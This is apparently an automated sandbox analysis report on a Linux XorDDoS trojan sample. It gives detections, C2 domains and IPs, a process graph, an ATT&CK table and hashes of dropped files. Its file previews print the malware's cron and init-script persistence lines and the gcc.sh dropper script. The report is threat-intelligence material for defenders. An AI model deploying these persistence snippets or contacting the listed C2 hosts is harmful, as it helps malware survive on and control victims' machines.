        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6457, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6461, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6463, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6469, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6472, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6474, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6477, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6480, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6486, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6491, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6493, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6496, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6499, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6506, type: MEMORYSTR
        Source: Yara matchFile source: /usr/bin/ibkljkndlm, type: DROPPED
        Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
        Source: Yara matchFile source: /usr/bin/qrabekbstr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/kigdktzeum, type: DROPPED
        Source: Yara matchFile source: /usr/bin/eqznayducj, type: DROPPED
        Source: Yara matchFile source: /usr/bin/wvbxepjyjx, type: DROPPED
        Source: Yara matchFile source: /usr/bin/sxruomujjd, type: DROPPED
        Source: Yara matchFile source: /usr/bin/buxftyvhwp, type: DROPPED
        Source: Yara matchFile source: /usr/bin/iulapzbfpq, type: DROPPED
        Source: Yara matchFile source: /usr/bin/gnmftoxpza, type: DROPPED
        Source: Yara matchFile source: /usr/bin/posifzmmhg, type: DROPPED
        Source: Yara matchFile source: /usr/bin/sotpizdssr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/becqudbgme, type: DROPPED
        Source: Yara matchFile source: /usr/bin/mizdkrdyqj, type: DROPPED
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Systemd Service
        1
        Systemd Service
        12
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts1
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        File Deletion
        Security Account Manager1
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive14
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        {"C2 list": ["http://aaa.dsaj2a.org/config.rar\u00007.com:25", "ww.dnstells.com:25"]}
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1495718 Sample: HaJTqGiPpD Startdate: 20/08/2024 Architecture: LINUX Score: 100 74 aaa.dsaj2a.org 23.253.46.64, 35282, 80 RACKSPACEUS United States 2->74 76 ww.gzcfr5axf7.com 2->76 78 5 other IPs or domains 2->78 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 6 other signatures 2->94 10 dash rm HaJTqGiPpD 2->10         started        12 dash rm 2->12         started        14 systemd snapd-env-generator 2->14         started        signatures3 process4 process5 16 HaJTqGiPpD 10->16         started        file6 64 /usr/lib/libudev.so, ELF 16->64 dropped 66 /usr/bin/wvbxepjyjx, ELF 16->66 dropped 68 /usr/bin/sxruomujjd, ELF 16->68 dropped 70 13 other malicious files 16->70 dropped 80 Drops files in suspicious directories 16->80 82 Sample deletes itself 16->82 84 Sample tries to persist itself using cron 16->84 86 Sample tries to persist itself using System V runlevels 16->86 20 HaJTqGiPpD sh 16->20         started        24 HaJTqGiPpD 16->24         started        26 HaJTqGiPpD 16->26         started        28 110 other processes 16->28 signatures7 process8 file9 72 /etc/crontab, ASCII 20->72 dropped 96 Sample tries to persist itself using cron 20->96 30 sh sed 20->30         started        33 HaJTqGiPpD kigdktzeum 24->33         started        35 HaJTqGiPpD kigdktzeum 26->35         started        37 HaJTqGiPpD kigdktzeum 28->37         started        39 HaJTqGiPpD kigdktzeum 28->39         started        41 HaJTqGiPpD kigdktzeum 28->41         started        43 107 other processes 28->43 signatures10 process11 signatures12 100 Sample tries to persist itself using cron 30->100 45 kigdktzeum 33->45         started        48 kigdktzeum 35->48         started        50 kigdktzeum 37->50         started        52 kigdktzeum 39->52         started        54 kigdktzeum 41->54         started        56 mizdkrdyqj 43->56         started        58 mizdkrdyqj 43->58         started        60 sxruomujjd 43->60         started        62 103 other processes 43->62 process13 signatures14 98 Sample deletes itself 50->98
        SourceDetectionScannerLabelLink
        HaJTqGiPpD72%ReversingLabsLinux.Trojan.XorDDoS
        HaJTqGiPpD100%AviraLINUX/Xorddos.cona
        HaJTqGiPpD100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        /usr/bin/posifzmmhg100%AviraLINUX/Xorddos.cona
        /usr/bin/sxruomujjd100%AviraLINUX/Xorddos.cona
        /usr/bin/sotpizdssr100%AviraLINUX/Xorddos.cona
        /usr/bin/kigdktzeum100%AviraLINUX/Xorddos.cona
        /usr/bin/ibkljkndlm100%AviraLINUX/Xorddos.cona
        /usr/lib/libudev.so100%AviraLINUX/Xorddos.cona
        /usr/bin/wvbxepjyjx100%AviraLINUX/Xorddos.cona
        /usr/bin/eqznayducj100%AviraLINUX/Xorddos.cona
        /usr/bin/qrabekbstr100%AviraLINUX/Xorddos.cona
        /usr/bin/mizdkrdyqj100%AviraLINUX/Xorddos.cona
        /usr/bin/iulapzbfpq100%AviraLINUX/Xorddos.cona
        /usr/bin/gnmftoxpza100%AviraLINUX/Xorddos.cona
        /usr/bin/becqudbgme100%AviraLINUX/Xorddos.cona
        /usr/bin/buxftyvhwp100%AviraLINUX/Xorddos.cona
        /usr/bin/posifzmmhg100%Joe Sandbox ML
        /usr/bin/sxruomujjd100%Joe Sandbox ML
        /usr/bin/sotpizdssr100%Joe Sandbox ML
        /usr/bin/kigdktzeum100%Joe Sandbox ML
        /usr/bin/ibkljkndlm100%Joe Sandbox ML
        /usr/lib/libudev.so100%Joe Sandbox ML
        /usr/bin/wvbxepjyjx100%Joe Sandbox ML
        /usr/bin/eqznayducj100%Joe Sandbox ML
        /usr/bin/qrabekbstr100%Joe Sandbox ML
        /usr/bin/mizdkrdyqj100%Joe Sandbox ML
        /usr/bin/iulapzbfpq100%Joe Sandbox ML
        /usr/bin/gnmftoxpza100%Joe Sandbox ML
        /usr/bin/becqudbgme100%Joe Sandbox ML
        /usr/bin/buxftyvhwp100%Joe Sandbox ML
        /etc/cron.hourly/gcc.sh42%ReversingLabsLinux.Network.Xor
        /usr/lib/libudev.so72%ReversingLabsLinux.Trojan.XorDDoS
        No Antivirus matches
        SourceDetectionScannerLabelLink
        ww.dnstells.com:25100%Avira URL Cloudmalware
        http://www.gnu.org/software/libc/bugs.html0%Avira URL Cloudsafe
        http://aaa.dsaj2a.org/config.rar0%Avira URL Cloudsafe
        http://aaa.dsaj2a.org/config.rar7.com:250%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        aaa.dsaj2a.org
        23.253.46.64
        truetrue
          unknown
          ww.gzcfr5axf6.com
          23.235.171.197
          truefalse
            unknown
            ww.dnstells.com
            unknown
            unknowntrue
              unknown
              ww.gzcfr5axf7.com
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                ww.dnstells.com:25true
                • Avira URL Cloud: malware
                unknown
                http://aaa.dsaj2a.org/config.rartrue
                • Avira URL Cloud: safe
                unknown
                http://aaa.dsaj2a.org/config.rar7.com:25true
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.gnu.org/software/libc/bugs.htmlHaJTqGiPpD, posifzmmhg.17.dr, sxruomujjd.17.dr, sotpizdssr.17.dr, kigdktzeum.17.dr, ibkljkndlm.17.dr, libudev.so.17.dr, wvbxepjyjx.17.dr, eqznayducj.17.dr, qrabekbstr.17.dr, mizdkrdyqj.17.dr, iulapzbfpq.17.dr, gnmftoxpza.17.dr, becqudbgme.17.dr, buxftyvhwp.17.drfalse
                • Avira URL Cloud: safe
                unknown
                http://aaa.dsaj2a.org/config.rar7.com:25HaJTqGiPpD, 6229.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6231.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6232.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6233.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6263.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6266.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6269.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6272.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6274.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6280.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6283.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6285.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6288.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6291.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6298.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6300.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6303.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6306.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6310.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6328.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6331.1.00000000ffecc000.00000000ffeed000.rw-.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                23.253.46.64
                aaa.dsaj2a.orgUnited States
                19994RACKSPACEUStrue
                23.235.171.197
                ww.gzcfr5axf6.comUnited States
                26484IKGUL-26484USfalse
                91.189.91.43
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                23.253.46.64Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                • doubleenough.net/index.php
                gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                • doubleenough.net/index.php
                Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                • doubleenough.net/index.php
                gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                • doubleenough.net/index.php
                spug64.exeGet hashmaliciousSimda StealerBrowse
                • gahyqah.com/login.php
                0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                • gahyqah.com/login.php
                JevgQ6OvYY.exeGet hashmaliciousSimda StealerBrowse
                • gahyqah.com/login.php
                task2.binGet hashmaliciousXorDDoSBrowse
                • aaa.dsaj2a.org/config.rar
                task2.binGet hashmaliciousXorDDoSBrowse
                • aaa.dsaj2a.org/config.rar
                task2.binGet hashmaliciousXorDDoSBrowse
                • aaa.dsaj2a.org/config.rar
                23.235.171.197http://43.249.172.195:888/112sGet hashmaliciousUnknownBrowse
                  http://43.249.172.195:888/112sGet hashmaliciousUnknownBrowse
                    112Get hashmaliciousXorDDoSBrowse
                      RDf54Bs5B8Get hashmaliciousXorDDoSBrowse
                        A5VDNgeGpnGet hashmaliciousXorDDoSBrowse
                          91.189.91.43SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elfGet hashmaliciousUnknownBrowse
                            arm7.elfGet hashmaliciousUnknownBrowse
                              157-15124.elfGet hashmaliciousUnknownBrowse
                                92.249.48.62-mips-2024-08-19T13_42_59.elfGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elfGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elfGet hashmaliciousMiraiBrowse
                                      SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elfGet hashmaliciousMiraiBrowse
                                        SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elfGet hashmaliciousMiraiBrowse
                                          93.123.85.86-sparc-2024-08-18T08_22_12.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            tarm7.elfGet hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              aaa.dsaj2a.orgtask2.binGet hashmaliciousXorDDoSBrowse
                                              • 23.253.46.64
                                              task2.binGet hashmaliciousXorDDoSBrowse
                                              • 23.253.46.64
                                              task2.binGet hashmaliciousXorDDoSBrowse
                                              • 23.253.46.64
                                              4ljhdTTyiAGet hashmaliciousXorDDoSBrowse
                                              • 23.253.46.64
                                              ww.gzcfr5axf6.com23.virGet hashmaliciousXorDDoSBrowse
                                              • 172.81.99.10
                                              23.virGet hashmaliciousXorDDoSBrowse
                                              • 43.229.113.27
                                              CCCxor.oGet hashmaliciousXorDDoSBrowse
                                              • 23.248.237.29
                                              task2.binGet hashmaliciousXorDDoSBrowse
                                              • 23.248.237.29
                                              task2.binGet hashmaliciousXorDDoSBrowse
                                              • 23.248.237.29
                                              task2.binGet hashmaliciousXorDDoSBrowse
                                              • 23.248.237.29
                                              23Get hashmaliciousXorDDoSBrowse
                                              • 103.213.247.92
                                              23Get hashmaliciousXorDDoSBrowse
                                              • 23.228.113.246
                                              EgrT0zBhDaGet hashmaliciousXorDDoSBrowse
                                              • 23.228.113.246
                                              4ljhdTTyiAGet hashmaliciousXorDDoSBrowse
                                              • 104.161.25.33
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CANONICAL-ASGBSecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              157-15124.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              92.249.48.62-mips-2024-08-19T13_42_59.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.ELF.Mirai-BJH.25754.5582.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.31639.13798.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              CANONICAL-ASGBSecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              157-15124.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              92.249.48.62-mips-2024-08-19T13_42_59.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.ELF.Mirai-BJH.25754.5582.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              SecuriteInfo.com.Linux.Mirai.1424.31639.13798.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              RACKSPACEUShttps://ladentiste.in/portalserverloading/npf1dwpar6jvqtbgya/eXVsaXlhLmtyaWt1bm92YUB0YWJvcmRhc29sdXRpb25zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 50.57.31.206
                                              https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 50.57.31.206
                                              https://succes.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                              • 50.57.31.206
                                              https://p2p.travelers.com/human.aspx?OrgID=3217&language=en&Username=melvinat%40davislaw.com&Arg06=178870601&Arg12=messageGet hashmaliciousUnknownBrowse
                                              • 50.56.19.115
                                              Updated Handbook.docxGet hashmaliciousUnknownBrowse
                                              • 50.57.31.206
                                              CourtOrder.docxGet hashmaliciousHTMLPhisherBrowse
                                              • 50.57.31.206
                                              PIay__Now__Hi Goodmorning!#7202221511.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 50.57.31.206
                                              sora.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 146.20.121.242
                                              45.66.231.148-mipsel-2024-07-30T12_25_27.elfGet hashmaliciousUnknownBrowse
                                              • 198.61.249.63
                                              http://cdn.amxprd.com/en-us/business/checking/get-started/using-your-business-debit-cardGet hashmaliciousUnknownBrowse
                                              • 50.57.7.78
                                              INIT7CHSecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              157-15124.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              92.249.48.62-mips-2024-08-19T13_42_59.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              93.123.85.86-sparc-2024-08-18T08_22_12.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 109.202.202.202
                                              tarm7.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              IKGUL-26484USnullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                              • 156.249.231.105
                                              nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 156.249.231.183
                                              b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                              • 156.249.34.142
                                              teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                              • 192.126.124.174
                                              arm5-20240807-1021.elfGet hashmaliciousMiraiBrowse
                                              • 156.231.181.90
                                              154.216.17.9-skid.m68k-2024-08-04T06_23_08.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.249.34.123
                                              154.216.17.9-skid.mips-2024-08-04T06_23_09.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.249.34.105
                                              154.216.17.9-skid.x86-2024-08-04T06_23_12.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.238.135.149
                                              77.90.35.9-skid.arm5-2024-07-30T07_10_52.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.249.231.162
                                              77.90.35.9-skid.sh4-2024-07-30T07_10_53.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.231.211.151
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              /etc/cron.hourly/gcc.sheTASxT3bjO.elfGet hashmaliciousXorDDoSBrowse
                                                TmoTjBkSXT.elfGet hashmaliciousXorDDoSBrowse
                                                  dptxrnhxmx.elfGet hashmaliciousXorDDoSBrowse
                                                    1.elfGet hashmaliciousXorDDoSBrowse
                                                      iJl2Sb6qRaGet hashmaliciousXorDDoSBrowse
                                                        Di1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                                                          fuck.elfGet hashmaliciousXorDDoSBrowse
                                                            dkuidbsedpGet hashmaliciousXorDDoSBrowse
                                                              libudev.soGet hashmaliciousXorDDoSBrowse
                                                                23.virGet hashmaliciousXorDDoSBrowse
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:POSIX shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):228
                                                                  Entropy (8bit):4.807897441464882
                                                                  Encrypted:false
                                                                  SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                                  MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                                  SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                                  SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                                  SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                  Joe Sandbox View:
                                                                  • Filename: eTASxT3bjO.elf, Detection: malicious, Browse
                                                                  • Filename: TmoTjBkSXT.elf, Detection: malicious, Browse
                                                                  • Filename: dptxrnhxmx.elf, Detection: malicious, Browse
                                                                  • Filename: 1.elf, Detection: malicious, Browse
                                                                  • Filename: iJl2Sb6qRa, Detection: malicious, Browse
                                                                  • Filename: Di1p3oLnDb.elf, Detection: malicious, Browse
                                                                  • Filename: fuck.elf, Detection: malicious, Browse
                                                                  • Filename: dkuidbsedp, Detection: malicious, Browse
                                                                  • Filename: libudev.so, Detection: malicious, Browse
                                                                  • Filename: 23.vir, Detection: malicious, Browse
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                                  Process:/bin/sh
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):41
                                                                  Entropy (8bit):3.8484226636198593
                                                                  Encrypted:false
                                                                  SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                                  MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                                  SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                                  SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                                  SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:*/3 * * * * root /etc/cron.hourly/gcc.sh.
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:POSIX shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.271199911345881
                                                                  Encrypted:false
                                                                  SSDEEP:6:hUtoFdU9Y6YsKheJWiBE21YJvmNeMwhi21DzRIY76Mz/L4:6tvBEMO1XzuGzE
                                                                  MD5:A4249CBDD3E77F754C770D0D4BADFCD7
                                                                  SHA1:AF13C124BBAE07E9FEC4D6B6C15C93754294669C
                                                                  SHA-256:B04C8A680391C1D99E17AB4023770030DA491523344B29CB584FBCDB9E0179FC
                                                                  SHA-512:4B22C0066D30694E0933D988768EF47FEB348C8859275AA15D2C6239D89F2E717B4B9EA36FAA33C42053C34FE0F0FA6B01921D2A8330E9446AA18156CA35895B
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: HaJTqGiPpD.### BEGIN INIT INFO.# Provides:..HaJTqGiPpD.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.HaJTqGiPpD.### END INIT INFO.case $1 in.start)../tmp/HaJTqGiPpD..;;.stop)..;;.*)../tmp/HaJTqGiPpD..;;.esac.
                                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):76
                                                                  Entropy (8bit):3.7627880354948586
                                                                  Encrypted:false
                                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):32
                                                                  Entropy (8bit):3.9681390622295662
                                                                  Encrypted:false
                                                                  SSDEEP:3:1IcWNfq6Qn:uun
                                                                  MD5:BD302FBB2B2236B9E6C684C5A4DBC617
                                                                  SHA1:5EA76686CAD0213B547D838BFC6F0A82C503C791
                                                                  SHA-256:8AD39FBDC67DC28FA0BF06556FCF78E6886CB9E230288DA835D878192651995C
                                                                  SHA-512:E4CA7C999D1EF1D6154F3B6536CC300833225FE21EA04B0BFC09F46D2ABFA3985E486A8FDB164D18601FA46E405F7F47E2F1F59FB057BF1E474FBF2597F8C070
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:mmsjyydscymtdecauqkhzjvkjzvvgigu
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244379813145034
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Am:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91n
                                                                  MD5:CB780D7AE3EF97F4221A67B15940A84D
                                                                  SHA1:75AA739FAD68A3B1819D624655D4BC13651643DD
                                                                  SHA-256:ED44EE9B5E60D181E5C9F73FFCA99DF938824D62DC0226B66EE380F04826FCC7
                                                                  SHA-512:CEFE593BCA33720E631321B63CB79834CEFE346D0BB6A1AD9CBC7BC5BA2DD51406841B5E3CFCAA36032650EDB5624B6F5DF24CB1B6DF0008C3F035C535668280
                                                                  Malicious:true
                                                                  Yara Hits:
